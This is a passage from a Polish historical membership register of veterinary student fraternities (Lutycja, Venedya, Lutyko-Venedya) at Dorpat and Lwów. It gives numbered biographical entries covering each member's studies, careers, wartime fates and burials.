 82. Marian Dowgierd, (1862 - ) student i absolwent 1892 Instytutu Weterynaryjnego w Dorpacie, c. 1885 Lutycja, w 1931 emerytowany lekarz weterynarii w Warszawie
 83. Michał Downarowicz, (1870 - ) student i absolwent 1894 Instytutu Weterynaryjnego w Dorpacie, c. 1890 Lutycja, w 1931 lekarz powiatowy w Warszawie
 84. Bolesław Drożd vel Drożdż (Drozd), (1899 - ) student i absolwent 1931 AMW, akt. 1925-27, w 1931 lekarz miejski w miejsc. Grodziec pow. Będzin

  Edward Drue

 85. Edward Drue, (1884 - ) student i absolwent 1912 Instytutu Weterynaryjnego w Dorpacie, c. 1912 Venedya, w 1931 lekarz miejski w Lublinie

 86. Maurcy Dulski, c. 1888 Lutycja
 87. Antoni Durowicz, c. 1890 Lutycja
 88. Władysław Dworzecki-Bogdanowicz, c. 1894 Lutycja
 89. Tadeusz Dziubek, (1915 w Częstochowie - ) student i absolwent AMW, c. 1936?, akt. 1936?-39, po wojnie prof. AR w Poznaniu
 90. Henryk Ejsymontt, c. II sem. 1912 Venedya
 91. Józef Engel, c. 1886 Lutycja
 92. Leopold Erdstein (po wojnie Ugorski), (1917-1985) akt. 1938, pracownik naukowy AR we Wrocławiu
 93. Witold Falkowski, c. 1904-06 Lutycja
 94. Witold Fedorowski, c. ok. 1930
 95. Stanisław Filipowicz, (1885 - ) student i absolwent 1913 Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, w 1931 lekarz powiatowy w Makowie Mazowieckim
 96. Władysław Filipowicz, c. 1886 Lutycja
 97. Zygmunt Feliks Filipowicz, (18 sierpnia 1883 - ) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, założyciel Venedyi 1907, oficer zawodowy, ppłk WP
 98. Marian Filipowski, (1903-1963 w Szamotułach) akt. 1926-27
 99. Stefan Flek, akt. 1931

  Jan Francuzowicz, 1905 r.

 100. Jan Francuzowicz, (5 lutego 1868 w gub. kowieńskiej - 26 czerwca 1941 w Radoszkowicach pow. Mołodeczno) s. Waleriana, ojciec Jerzego (Demetria), student i absolwent 1894 Instytutu Weterynaryjnego w Dorpacie, c. 1890 Lutycja, po studiach lekarz wet. w Św. Krzyżu na Kaukazie, w 1923 wrócił do Polski, pracował jako lekarz graniczny w Rodoszkowicach pow. Mołodeczno w woj. wileńskim, zginął podczas rosyjskiego bombardowania Radoszkowic w początkach inwazji Niemiec na ZSRR, pochowany na Cmentarzu w Radoszkowicach

 101. Edward Frankowski, akt. 1925-27
 102. Józef Gałczyński, (1883 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, w 1931 lekarz powiatowy w Janowie Podlaskim
 103. Wacław Garłowicz, c. 1897 Lutycja
 104. Marian Garnuszewski, (1889 w Warszawie - ) s. Antoniego i Walerii z d. Bałutowskiej, student i absolwent Instytutu Weterynaryjnego w Dorpacie, c. I sem. 1910 Venedya, po studiach wyjechał na Kaukaz, gdzie brał udział w walkach na Kaukazie, zaginął
 105. Zbigniew Gaugusch, (1912 we Lwowie - 1982 w Puławach) c. ok. 1930, pochodził z Zakopanego, po wojnie prof. Instytut Weterynaryjnego w Puławach

  Kazimierz Gintrowicz, druga poł. lat 30-tych.

 106. Kazimierz Gintrowicz, (1 lutego 1914 w Poznaniu - 20 czerwca 1979 w Poznaniu) absolwent Gimnazjum w Wolsztynie, student i absolwent 1938 AMW, akt. 1932-39, trzykrotny prezes, olderman sem. zim. 1939/40 (ostatnie Prezydium przed wojną), plut. pchor. rez., w wojnie obronnej 1939 w 7 Pułku Strzelców Konnych Wielkopolskich Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, m.in. walczył nad Bzurą, aktywny działacz konspiracyjny ps. “Veneda”, aresztowany w 1943 przez Gestapo, więziony w Grodzisku Wlkp. oraz Forcie VII w Poznaniu, więzień obozów koncentracyjnych w Auschwitz, Sachsenhausen oraz Oranienburga, po wojnie pracował w Urzędzie Wojewódzkim w Poznaniu oraz kierował lecznicą weterynaryjną w Świebodzienie, powiatowy lekarz weterynarii w Nowym Tomyślu 1951-78, główny specjalista WZWet. w Poznaniu 1978-79, działacz społeczny, odznaczony m.in. Srebrnym i Złotym Krzyżem Zasługi

 107. Jan Gniadek, (1913 w Nowym Sączu - 1987) akt. 1938-39
 108. Leon Gniewiewski, (1876 - ) student i absolwent 1899 Instytutu Weterynaryjnego w Dorpacie, c. 1895 Lutycja, w 1931 lekarz wolnopraktykujący w Łukowie pow. Łuków
 109. Aleksander Godycki-Ćwirko, (1872 - ) student Instytutu Weterynaryjnego w Dorpacie, c. 1896 Lutycja, dpl. Charków 1900, w 1931 lekarz powiatowy w Nieświeżu
 110. Alfred Godziszewski, c. 1893 Lutycja
 111. Kazimierz Goliszewski, (1909 w Katowicach - ) student i absolwent 1935 AMW, c. ok. 1930 Lutyko-Vendya, prezes 1932/33, wraz z grupą kolegów dokonał w 1935 rozłamu w Lutyko-Vendyi i odnowił Lutycję
 112. Stanisław Maurycy Golonka, (1907 we Włodzimierzu Wołyńskim - ) student i absolwent 1934 AMW
 113. Bronisław Gorczyński, akt. 1925-27
 114. Stanisław Gorczyński, (1883 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. 1909-17 Lutycja, w 1931 lekarz miejski w Ciechanowcu, pow. Bielski
 115. Marian Gorgolewski, (1906 w Witkowie -1966) brat Wiktora (Gedania Posnaniensis), student i absolwent 1931 AMW, c. 1926/27, w 1937 lekarz wet. w Witkowie pow. Gniezno
 116. Bolesław Grabowski, c. 1891 Lutycja
 117. Czesław Grabowski, (1904 - 6 listopada 1969 w Opalenicy) student i absolwent 1931 AMW, c. 1925, akt. 1925-31, wiceprezes 1926, prezes 1927, w 1937 lekarz wet. w Opalenicy pow. Nowy Tomyśl, ppor. rez., uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagu Neubrandenburg
 118. Dominik Gregorkiewicz, (1884 - 20 stycznia 1943 we Lwowie) student i absolwent 1908 (?) AMW, w 1931 lekarz miejski Lwowa 1931
 119. Jan Gregorkiewicz, (8 lutego 1906 w Złotowie - ) student i absolwent 1937 AMW, olderman 1930 i sem. let. 1930/31, dpl. 1937, dr wet., w 1937 lekarz w Rzeźni Miejskiej w Czarnkowie, po wojnie na emigracji w Wielkiej Brytanii

  Jan Grodkowski, 1931 r.

 120. Jan Grodkowski, ( - 27 listopada 1932 we Lwowie) student AMW, c. ok. 1930, fuksmajor 1931, zginął w trakcie bójki po uderzeniu przez członka żydowskiej korporacji Fraternitas na ul. Szajnochy we Lwowie, jego śmierć wywołała zamieszki we Lwowie, pochowany na Cmentarzu Łyczakowskim

 121. Mieczysław Grotowski, c. II sem. 1907 Venedya
 122. Andrzej Grotus, (1886 - ) student i absolwent 1892 Instytutu Weterynaryjnego w Dorpacie, c. 1888 Lutycja, w 1931 lekarz wolnopraktykujący w Baranowiczach
 123. Ignacy Grymiński, (1885 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. 1908 Lutycja, w 1931 lekarz miejski w Warszawie
 124. Kazimierz Grzeszek, akt. 1926-27
 125. Bolesław Paweł Aleksander Grzywacz, (1907 - 1945 we Lwowie) student i absolwent 1931 AMW, akt. 1926-33, dr wet. 1934
 126. Witold Józef Gucfa (Gucwa), (14 czerwca 1909 w miejsc. Sołotwina - 1940 w Charkowie) s. Franciszka, student i absolwent 1933 AMW, asystent AMW, ppor. rez., w wojnie obronnej 1939 w Dywizjonie Artylerii Konnej, w więzieniu sowieckim w Starobielsku, zamordowany przez NKWD
 127. Teodor Gutowski, c. 1887 Lutycja

  Henryk Hamerski, 1939 r.

 128. Henryk Hamerski, student AMW, akt. 1938-39

 129. Daniel Hegacewicz, c. 1887 Lutycja
 130. Romuald Hayder, c. 1925, akt. 1925-27
 131. Alfons Antoni Heinsch, (1906/7? w Szamotułach - 1987 w Krotoszynie) student i absolwent 1930 AMW, akt. 1926-29, sekretarz 1926, wiceprezes 1927, prezes 1928 i 29, po studiach lekarz wet. w Szamotułach, w 1938 prezes Poznańskiego Koła Filistrów
 132. Władysław Heinsch, student AMW, c. 1938/39
 133. Tadeusz Hellstein, c. ok. 1930
 134. Wiktor Hołyński, (1885 - ) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, w 1931 lekarz wolnopraktykujący w Sochaczewie
 135. Wacław Hryckiewicz, akt. 1926-27
 136. Roman Hulewicz, (1889 w Poznaniu - 1975 w Mogilnie) student i absolwent 1913 Instytutu Weterynaryjnego w Dorpacie, w II Rzeczypospolitej oficer zawodowy, ppłk WP, za wojnę 1920 odznaczony Krzyżem Walecznych
 137. Herwig Hutl (Hútl, Húttl), student AMW, akt. 1938-39
 138. Franciszek Iwaszkiewicz, c. 1897 Lutycja
 139. Stanisław Iwaszkiewicz, (1878 - ) student i absolwent 1907 Instytutu Weterynaryjnego w Dorpacie, c. 1901 Lutycja, oficer zawodowy, płk WP
 140. Lucjan Izbicki, (1883-1928) c. 1904-06 Lutycja, praktyk i społecznik na terenie kresów
 141. Tadeusz Jachimowicz, c. ok. 1930
 142. Franciszek Ksawery Jagodziński, (3 grudnia 1902 w Wejherowie - 1 lutego 1951) s. Nikodema i Anieli, student i absolwent 1930 AMW, akt. 1925-27, w 1931 lekarz miejski w Wejherowie, kierownik lecznicy, pochowany na starym cmentarzu w Wejherowie
 143. Bogdan Jakubowski, c. 1886 Lutycja
 144. Feliks Jakubowski, ( - ur. na Syberii - ok. 1917-18 w Rosji) z rodziny zesłańców na Sybir, student weterynarii w Dorpacie, c. 1886 Lutycja
 145. Stefan Jakubowski, (21 października 1895 w Gninie pow. Grodzisk Wlkp. - 20 lutego 1985 w Opolu) s. Ignacego (nauczyciela ludowego) i Ludwiki z d. Slupińskiej, uczeń gimnazjów w Wągrowcu i klaszycznym w Inowrocławiu (matura 1915), działał w Towarzystwie Tomasza Zana i Tajnych Drużynach Harcerskich, w 1915 powołany do wojska pruskiego, ochotnik w stopniu kaprala w powstaniu wielkopolskim w III Batalionie 10 Pułku Strzelców Wielkopolskich, brał udział w walkach o Inowrocław, Szubin, Rynarzewo i Czarnków, w maju 1919 jako ochotnik w Grupie Wielkopolskiej przy obronie Lwowa, brał udział w walkach pod Bóbrką, Husiatynem, Podhajcami oraz Zbruczem, odznaczony odznaką “Orląt”, student i absolwent AMW 1921-25, członek Venedyi, potem Lutyko-Venedyi, akt. 1921-27, prezes Bratniej Pomocy Studentów AMW 1923/24, współorganizator i pierwszy prezes 1925-27 Chóru Studentów AMW, inicjator wybudowania domu akademickeigo przy ul. Stelmacha 1, ppor. rez. 1925, por. rez., asystent w Katedrze Chirurgii AMW 1925-27, dr med. wet. 1927, dyrektor rzeźni w Brodnicy 1927-28 i Starogradzie Gdańskim 1928-29, lekarz powiatowy w Grudziądzu 1929-33, organizator szkoły kucia koni w Grudziądzu, inspektor Weterynaryjnego Pomorskiego Urzędu Wojewódzkiego w Toruniu 1933-39, członek Zarządu Głównego Zrzeszenia Lekarzy RP 1937-39, w 1938 prezes Pomorskiego Koła Filistrów, w wojnie obronnej 1939 w Rzeźni Polowej nr 1 w Warszawie, w czasie okupacji pracował w firmie Bacutil przy rzeźni w Lublinie, żołnierz NSZ, w 1944 w Komitecie Weterynaryjnym przy PKWN, od 1945 naczelnik Wydziału Weterynarii Urzędu Wojewódzkeog w Bydgoszczy, w 1946 arsztowany za działalność konspiracjną, po zwolnieniu lekarz wet. Zjednoczenia PGR w Opolu 1947-1965, w latach 60-tych wykładał historię med. wet. na Wydziale Weterynaryjnym WSR we Wrocławiu, 1966 habilitacja na podstawie dorobku i pracy pt. “Historia i rozwój podkowy w Polsce (ze szczególnym uwzględnieniem ziem śląskich”), doc. 1966, od 1968 na emeryturze, autor 75 publikowanych prac, m.in. “Polscy lekarze weterynarii w II Wojnie Światowej”, “II słownik polskich lekarzy weterynarii 1919-1983″, działacz organizacji weterynaryjnych i kombatanckich, , m.in. wiceprezes Zarządu Głównego Zrzeszenia Lekarzy Weterynarii 1961-65 oraz członek Krajowej Komisji Weteranów Powstania Wielkopolskiego, kierownik Sekcji Historycznej PTNW, a następnie Honorowy kierownik sekcji, pochowany na cmetnarzu Junikowskim w kwatwerze powstańców wielkpolskich w Poznaniu, odznaczony m.in. Krzyżem Obrony Lwowa (?), Krzyżem Kwalerskim 1961, Oficerskim 1982 OOP, Wielkopolskim Krzyżem Powstańczym 1958, Medalem za wojnę 1918-1921 1938, wyróżnieniem honorowym PTNW “Merito pro Societate” 1974, Złotą odznaką honorową ZLiTWet 1965 i Złotą odznaką honorową NOT 1968

  Mieczysław Jamro, 1926 r.

 146. Mieczysław Jamro, (7 lipca 1905 w Sękowej pow. Gorlice - 1940 w Katyniu) brat Jana (Scythia), s. Franciszka i Teofilii z Borków, student i absolwent 1935 AMW, c. 1926/27, akt. 1926/27-35, po studiach lekarz weterynarii w Hajnówce, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1933, ppor. rez., przydzielony do 3 Pułku Ułanów, w niewoli sowieckiej w obozie w Kozielsku, zamordowany przez NKWD

  Marian Janiak, 1931/32 r.

 147. Marian Ignacy Janiak, (1908 we Lwowie - 4 czerwca 1983 w Szwajcarii) student i absolwent 1934 AMW, sekretarz sem. zim. i sem. let. 1931/32, wiceprezes 1932, wiceprezes Bratniej Pomocy Studentów AMW 1931, dr wet. 1934, w 1937 lekarz wet. w Ostrzeszowie, habilitacja w Zurychu, po wojnie docent instytutu w Bazylei

 148. Manswed Janicki, c. 1886 Lutycja
 149. Jan Janikowski, c. 1886 Lutycja
 150. Władysław Janikowski, c. II sem. 1907 Lutycja, potem Venedya
 151. Antoni Jarmiński, (1883-1928) c. II sem. 1907 Venedya, działacz studencki, kronikarz Venedyi
 152. Konstanty Jasiński, c. 1897 Lutycja
 153. Dominik Jastrzębski, (1901-1971) student i absolwent 1927 AMW, akt. 1925-27, oficer zawodowy, kpt WP
 154. Jerzy Jaszczołt, c. 1900 Lutycja
 155. Bolesław Jażwiński (Jaźwiński), (1862 - ) student i absolwent 1893 (?) Instytutu Weterynaryjnego w Dorpacie, c. 1889 Lutycja, w 1931 emerytowany lekarz w Warszawie
 156. Kazimierz Jażwiński (Jaźwiński, c. 1901 Lutycja
 157. Kazimierz Jedliński, (1910 w Warszawie - 1980)
 158. Alfons Jeliński, student AMW, c. 1938/39

  Artur Jentys.

 159. Artur Jentys, (1863 we wsi Depułtycze k. Chełma - styczeń 1940 w Lublinie) s. Adama i Konstancji z d. Żmudzka, absolwent rządowego gimnazjum w Lublinie, student i absolwent 1890 Instytutu Weterynaryjnego w Dorpacie, c. 1886 Lutycja, po studiach pracował w Rosji, w 1917 wrócił do Polski, osiadł w Lublinie, gdzie pracował jako weterynarz, pochowany na Cmentarzu przy ul. Lipowej w Lublinie

  Piotr Jewdokimow, ok. 1900 r.

 160. Piotr Jewdokimow, (1877 - ) student i absolwent 1902 Instytutu Weterynaryjnego w Dorpacie, c. 1898 Lutycja, w 1931 lekarz powiatowy w Krzemieńcu

 161. Ryszard Jurczyk-Falkowski, c. II sem. 1907 Venedya
 162. Wacław Jurkiewicz, c. 1897 Lutycja

  Tadeusz Kajkowski, ok. 1926 r.

 163. Tadeusz Romuald Kajkowski, (6 stycznia 1907 w Czarkowie - 3 maja 1990) z rodziny inteligenckiej, absolwent klasycznego Gimnazjum w Wągrowcu, student AMW, c. ok. 1926 Lutyko-Venedya, następnie w poznańskiej Lechii, student i absolwent 1933 PID, akt. 1930-32 Sarmatia, po studiach prowadził gabinet stomatologiczny przy ul. Św. Marcin w Poznaniu, w czasie okupacji pracownik magistratu w Chodzieży, a po wojnie Urzędu Wojewódzkiego w Poznaniu, od 1950 dyrektor Wojewódzkiej Poradni Stomatologicznej w Poznaniu, dr stomatologii AM w Poznaniu 1951, później prowadził prywatną praktykę stomatologiczną przy ul. Św. Marcin 38, jeden z organizatorów powojennych spotkań Lechitów, pochowany w grobowcu rodzinnym na Cmentarzu przy ul. Lutyckiej w Poznaniu

 164. Piotr Kaminiarz, (1903 - 1995?) student i absolwent 1934 AMW, c. 1925, w 1937 lekarz wet. w Grotnikach pow. Leszno
 165. Stanisław Kamiński, wiceprezes 1937/38
 166. Zdzisław Karaś, (16 sierpnia 1914 - ) student AMW, akt. 1928-33, dpl. Wrocław 1946
 167. Bernard Adolf Karge, (6 czerwca 1914 w Chraplewie pow. Nowy Tomyśl - 12 maja 1944 pod Monte Cassino) student AMW, akt. 1938-39, lekarz wet., jako por. 13 Baonu Strzelców Karpackich poległ pod Monte Cassino
 168. Zbigniew Marian Kasprzak, (1908 - 1965 w Gnieźnie) student i absolwent 1934 AMW, dr wet. 1935, znany piłkarz “Dżentelmen”
 169. Kazimierz Wincenty Kęsicki, członek Venedyi, potem Lutyko-Venedyi
 170. Bolesław Kicia, (1910 - 1956 w Katowicach) student i absolwent 1939 AMW
 171. Mieczysław Kiełkiewicz, (1883 - ) student i absolwent 1909 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, w 1931 lekarz powiatowy w Wieluniu
 172. Julian Kiełmiński, akt. 1926-27
 173. Aleksander Kijewski, student prawa UD, c. 1911 Venedya (stały gość)
 174. Czesław Kisielewski, pochodził z Krakowa, brat Kazimierza i Zdzisława (obaj Arcadia), student AMW, akt. 1935-39
 175. Stefan Kisielewski, c. ok. 1930
 176. Jan Kiszkiel, członek Venedyi, potem Lutyko-Venedyi (?), [prawd. Jan Kiszkiel (25 stycznia 1865 we wsi Budziewizna w pow. sejneńskim - 9 stycznia 1951) absolwent weterynarii w Warszawie 1888, pracował jako okręgowy inspektor weterynarii w stepie kirgiskim, później weterynarz przy Bukiewskiej Ordzie, a następnie główny weterynarz w guberni astrachańskiej, od 1897 inspektor weterynaryjny w guberni piotrkowskiej, w czasie I wojny światowej od 1915 lekarz weterynarii w armii rosyjskiej, do kraju wrócił w 1920, po powrocie lekarz wojskowy w stopniu podpułkownika, dr wet. UW 1925, wykładowca z administracji i ustawdawstwa weterynaryjnego oraz weterynarii sądowej UW, od lat dwudziestych naczelnik wydziału w Departamencie Weterynaryjnym Ministerstwa Rolnictwa, działacz społeczny, m.in. prezes Polskiego Towarzystwa Lekarzy Weterynaryjnych oraz przewodniczący Komisji Skór Polskiego Komitetu Normalizacyjnego, autor wspomnień “Na dziejowej fali. Z Piotrkowa przez Władywostok do Śniatynia” oraz “Wyzwolenie. Okruchy przeżyć i wrażeń” (Bydgoszcz 2003), pochowany na warszawskich Powązkach (aleja Y, kwatera 235) [vide także Polski Słownik Biograficzny, t. 12, s. 519 i n.]
 177. Mieczysław Klepacki, student AMW, c. 1938/39
 178. Stefan Klicki, (14 kwietnia 1902 - ) student i absolwent 1929 AMW, akt. 1925, w 1931 lekarz miejski w Poznaniu
 179. Marian Kliński student, AMW, c. 1938/39
 180. Jerzy Kobylański, c. II sem. 1907 Venedya

  Stefan Koeppe, ok. 1915 r.

 181. Stefan Leszek Koeppe, (1896-1975) brat Władysława (Lutyko-Venedya) student Instytutu Weterynaryjnego w Dorpacie 1914-18, student i absolwent 1921 AMW, ostatni prezes w Dorpacie i pierwszy prezes Venedyi we Lwowie, wywiózł z Dorpatu sztandar i inne pamiątki, doprowadził do połączenia z Lutycją, olderman 1922/23, Filister honorowy (?) Lechicji 1938, dr wet., prof. SGGW

 182. Władysław Wawrzyniec Koeppe, (10 sierpnia 1889 - 1967) brat Stefana (Lutyko-Venedya) absolwent Gimnazjum Filologicznego w Czernigowie, od 1911 student Warszawskiego Instytutu Weterynaryjnego, żołnierz armii rosyjskiej 1915-18, członek POW, kpt WP, student i absolwent 1923 AMW

  Wincenty Kognowicki, ok. 1900 r.

 183. Wincenty Kognowicki, (1876 w maj. Skuby w pow. kowieńskim - 1927 w Kownie) s. Bolesława i Zofii z Nerlich Dąbskich, absolwent rosyjskiego Gimnazjum w Kownie, student i absolwent 1901 Instytutu Weterynaryjnego w Dorpacie, powiatowy lekarz wet. w Kownie, w czasie I wojny światowej lekarz wet. w armii rosyjskiej

 184. Stanisław Kokocha, (1908 w Bydgoszczy - 1953 w Bydgoszczy) student i absolwent 1935 AMW, akt. 1931
 185. Zbigniew Kokoszka, c. 1926/27
 186. Zbigniew Koliński, (1906 - ) student i absolwent 1932 AMW, c. 1926/27, akt. 1926/27-29, sekretarz 1929
 187. Leon Kołakowski, (1899 - ) student i absolwent 1925 AMW, Vendya, potem Lutyko-Venedya, w 1931 lekarz miejski w Sosnowcu
 188. Jan Koncowicz, c. 1926/27
 189. Witold Kopeć, c. 1893 Lutycja
 190. Bernard Korabiowski, (1892-1939) student i absolwent 1923 AMW, Vendya, potem Lutyko-Venedya, mjr WP, poległ w wojnie obronnej 1939
 191. Konstanty Kordasz, c. 1914-18 Venedya
 192. Antoni Korsak, (1881 - 1967) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. 1904-06 Lutycja, po studiach na Kaukazie, ok. 1924 wrócił do Polski, w 1931 lekarz powiatowy w Lubartowie
 193. Aleksander Korthais, (1906 w Koronowie - ) student i absolwent 1931 AMW, c. 1925, akt. 1925-27, po wojnie na emigracji w Australii
 194. Anastazy Tadeusz Koskowski, (16 kwietnia 1881 - 9 marca 1963) s. Floriana i Emilii z d. Weiss, student i absolwent Instytutu Weterynaryjnego w Dorpacie 1907-08, w 1931 lekarz miejski w Warszawie 1931, mjr lek. wet., pochowany na warszawskich Powązkach
 195. Bronisław Kossarski, c. 1895 Lutycja
 196. Jerzy Kostecki, c. 1908 Lutycja
 197. Tadeusz Kowal, (1912-1985) student AMW, początkowo w Lutyko-Venedyi, przeszedł do nowej Lutycji, wiceprezes 1934 i prezes 1935 Bratniej Pomocy Studentów AMW, dpl. Lwów 1942

  Bolesław Kozłowski, 1931 r.

 198. Bolesław Władysław Kozłowski, (29 lipca 1908 w Berlinie - lipiec 1975 w Lesznie) s. Tomasza i Kazimiery z d. Maszyńska, absolwent Gimnazjum im. Amosa Komeńskiego w Lesznie 1928, student i absolwent AMW 1928-35, sekretarz sem. let. 1930/31, po studiach lekarz wet. w Bojanowie k. Rawicza oraz wykładowca w Szkole Rolniczej, kierownik lecznicy dla zwierząt w Osiecznej k. Leszna 1949-74, artysta-fotografik, otrzymał liczne wyróżnienia w konkursach krajowych i zagranicznych

 199. Roman Marian Krajewski, (1905 - 1977 w Sępolnie Krajeńskim) student i absolwent 1930 AMW, c. 1926/27, wiceprezes Bratniej Pomocy Studentów AMW 1929
 200. Hubert Krasiczyński, (1916 - ) akt. 1937-39
 201. Stefan Krasuski, c. 1925, akt. 1925-27

  Tadeusz Jordan-Krąkowski

 202. Tadeusz Mirosław Jordan-Krąkowski, (10 lipca 1903 w Srebrnej Górze w pow. żnińskim - 3 marca 1980 w Grudziądzu) s. Maksymiliana Erazma, uczeń Gimnazjum w Trzemesznie, absolwent Gimnazjum w Ostrowie Wlkp., uczestnik wojny polsko-rosyjskiej 1920, w niewoli sowieckiej, student i absolwent 1930 AMW, akt. 1926-27, sekretarz Bratniej Pomocy Studentów AMW 1923, wiceprezes 1927, po studiach lekarz w rzeźni miejskiej w Stargardzie Gdańskim, a następnie do powiatowy lekarz wet. w Chełmnie, a od 1939 wojewódzki lekarz wet. w Bydgoszczy, w czasie okupacji lekarz wet. w rzeźni miejskiej w Gdyni 1940-45, po wojnie m.in. naczelny lekarz wet. w rzeźni w Grudziądzu, a od 1967 kierownik Weterynaryjnego Inspektoratu Sanitarnego w Zakładach Mięsnych w Grudziądzu, pochowany na Cmentarzu w Grudziądzu, w 2008 grób przeniesiono na Cmentarz Junikowski w Poznaniu

 203. Antoni (Aleksy Antoni) Kruszka, (14 stycznia 1890 w Kochanowie w pow. żnińskim - 1940 w Charkowie) s. Szczepana i Antoniny z Dudków, student i absolwent 1914 weterynarii w Dreźnie, od 1914 żołnierz 2 Pułku Piechoty Legionów, powstaniec wielkopolski w 1 Pułku Artylerii Piechoty, żołnierz wojny 1919-21 w 1 Pułku Artylerii Ciężkiej i 23 Pułu Artylerii Piechoty WP, student i absolwent 1923 AMW, członek Venedyi, a później Lutyko-Venedyi, dr wet. 1933, powiatowy lekarz weterynarii w Obornikach, mjr rez. służby weterynaryjnej, przydzielony do 7 Pułku Strzelców Konnych w Oddziale Zapasowym Wielkopolskiej Brygady Kawalerii w Armii Poznań, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD, odznaczony dwukrotnie Krzyżem Walecznych i Krzyżem Niepodległości
 204. Wacław Kryński, (1874 - ) student i absolwent 1898 Instytutu Weterynaryjnego w Dorpacie, c. 1894 Lutycja, w 1931 lekarz sejmikowy w Kłodawie w pow. Kolskim
 205. Władysław Krystof, ( - 4 czerwca 1991 w Szczecinie) student AMW, c. 1938/39
 206. Zdzisław Krzymuski, (26 listopada 1886 w Krzymowie k. Góry Kalwarii - 1937) s. Lucjana i Antoniny Emilii z Jaskółowskich, student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. I sem. 1910 Venedya, mjr lek. wet., w 1931 lekarz miejski w Warszawie, pochowany na warszawskich Powązkach
 207. Adam Krzysztoporski (Krysztoporski), (24 grudnia 1898 - ) student i absolwent 1929 AMW, akt. 1925-27, oficer zawodowy, kpt WP
 208. Karol Krzyżanowski, c. 1888 Lutycja

  Henryk Kubale, prawd. ok. 1930 r.

 209. Henryk Kubale, (12 stycznia 1903 - 1965) student i absolwent 1931 AMW, akt. 1926-27

 210. Bolesław Kuczyński, c. 1886 Lutycja
 211. Leon Kuczyński, (1867 - ) student i absolwent 1893 Instytutu Weterynaryjnego w Dorpacie, c. 1889 Lutycja, dr wet., w 1931 lekarz wet. wolnopraktykuący w Nowmy Dworze pow. Szczuczyn
 212. Marian Kukolewski, (1882 - ) c. 1904-06 Lutycja, założyciel Venedyi
 213. Kazimierz Kulikowski (Kuligowski), (1879 - ) student i absolwent 1908 Instytutu Weterynaryjnego w Dorpacie, c. 1904-06 Lutycja, założyciel Venedyi, w 1931 lekarz miejski w Warszawie
 214. Edmund Kuncewicz, c. 1896 Lutycja
 215. Jan Kurek, po II wojnie lekarz w Krakowie
 216. Władysław Kurnatowski, (1864-1925) założyciel Lutycji 1884, w czasie I wojny szef służb weterynaryjnych XV Korpusu armii rosyjskiej
 217. Mieczysław Kuryluk, c. II sem. 1907 Venedya
 218. Eugeniusz Kutaszewicz, (1884 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. 1904-06 Lutycja, w 1931 lekarz miejski w Pułtusku
 219. Jerzy Kutrewicz, c. 1891 Lutycja
 220. Roman Lalka, (1906 - ) student i absolwent 1932 AMW, c. 1926/27, akt. 1926/27-33
 221. Tadeusz Langer, c. 1926/27
 222. Jan Laskowski, (1899 - ) student i absolwent 1927 AMW, akt. 1925-27, w 1931 lekarz sejmikowy w Żółkiewce w pow. kranystawskim
 223. Roman Ledziński, (1913-1943) najpierw w Lutyko-Venedyi, jako fuks przeszedł w 1935 do odnowionej Lutycji, prezes Bratniej Pomocy Studentów AMW 1938
 224. Albin Lenkiewicz, (1880 - ) student i absolwent 1908 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, w 1931 lekarz powiatowy w Ciechanowie
 225. Lucjan Lenkiewicz-Ipohorski
  (Ipochawski-Lenkiewicz), (1873 - ) student i absolwent 1901 Instytutu Weterynaryjnego w Dorpacie, c. 1892 Lutycja, w 1931 lekarz samorządowy w Łagowie pow. Opatów

 226. Walenty Leszko, (1894 - 1939 we Lwowie) od 1914 student Instytutu Weterynaryjnego w Dorpacie, członek Venedyi, po wojnie student i absolwent 1922 AMW Lwów, prezes Bratniej Pomocy Studentów AMW 1922, w 1931 lekarz miejski w Brodnicy, zamordowany w więzieniu przez NKWD pod koniec 1939
 227. Wacław Leśkiewicz, c. 1907 Lutycja
 228. Eugeniusz Leśniewski, c. II sem. 1907 Venedya
 229. Paweł Leśniewski, (1885 - ) student i absolwent 1908 Instytutu Weterynaryjnego w Dorpacie, c. 1908 Lutycja, w 1931 lekarz sejmikowy w Płocku
 230. Helmut Lewandowski, akt. 1926-27
 231. Czesław Lewicki, (1905 - 26 listopada 1983 w Toruniu) pochodził z Poznania, student i absolwent 1931 AMW, akt. 1926-27, w 1931 referendarz w Tarnopolu
 232. Marian Lewicki, student AMW, c. 1938/39

  Władysław Linsenman, prawd. ok. 1911 r.

 233. Władysław Linsenman, (18 czerwca 1884 w Warszawie - kwiecień 1940 w Charkowie) s. Antoniego i Marianny z Sikorskich, absolwent Gimnazjum w Warszawie, student i absolwent 1911 Instytutu Weterynarii w Dorpacie, c. 1909 Lutycja, po studiach w armii carskiej na Kaukazie, wrócił do kraju 1918, uczestnik wojny polsko-rosyjskiej 1920 jako ordynator Szpitala Koni I Armii, w okresie międzywojennym lek. powiatowy w Sierpcu, mjr rez. służby weterynarii, w wojnie obronnej 1939 kierownik szpitala polowego koni, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD

  Mirosław Lipski, 1924 r.

 234. Mirosław Lipski, (1858-1938) student i absolwent 1887 Instytutu Weterynaryjnego w Dorpacie, założyciel Lutycji 1884, w 1931 lekarz miejski w Sosnowcu, działacz społeczny w Sosnowcu

 235. Wiktor Lorenc, (1881 - ) c. 1907 Lutycja, założyciel Venedyi 1907
 236. Karol Łaszkiewicz, (1867-1948? w Kowalewie Pomorskim) student i absolwent 1899 Instytutu Weterynaryjnego w Dorpacie, c. 1894 Lutycja, w 1931 lekarz miejski w Wilnie

  Tadeusz Łożyński, 1929 r.

